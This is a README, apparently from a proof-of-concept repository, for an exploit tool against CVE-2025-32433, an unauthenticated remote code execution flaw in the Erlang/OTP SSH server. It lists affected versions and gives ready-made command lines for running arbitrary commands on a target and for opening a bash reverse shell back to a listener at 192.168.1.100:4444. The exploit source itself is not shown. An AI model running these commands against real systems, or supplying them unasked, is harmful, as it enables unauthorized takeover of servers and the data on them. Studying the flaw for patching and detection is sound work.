CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP# CVE-2025-32433 Erlang/OTP SSH RCE EXP
## Description
A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.
## Affected Versions
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier
## Features
- Exploit Execution: Execute arbitrary commands.
- Reverse Shell: Initiate a bash-based reverse shell.
## Usage
### Execute a command:
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
### Initiate a reverse shell:
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

## References
[GitHub Advisory](https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2)
[NVD CVE-2025-32433](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)
[Platform Security](https://platformsecurity.com/blog/CVE-2025-32433-poc)
https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
[4.0K] /data/pocs/f7d9830f49ee2f9189a3a4b1c75eb26a29329a72
├── [227K] cve-2025-32433.png
└── [1.4K] README.md
0 directories, 2 files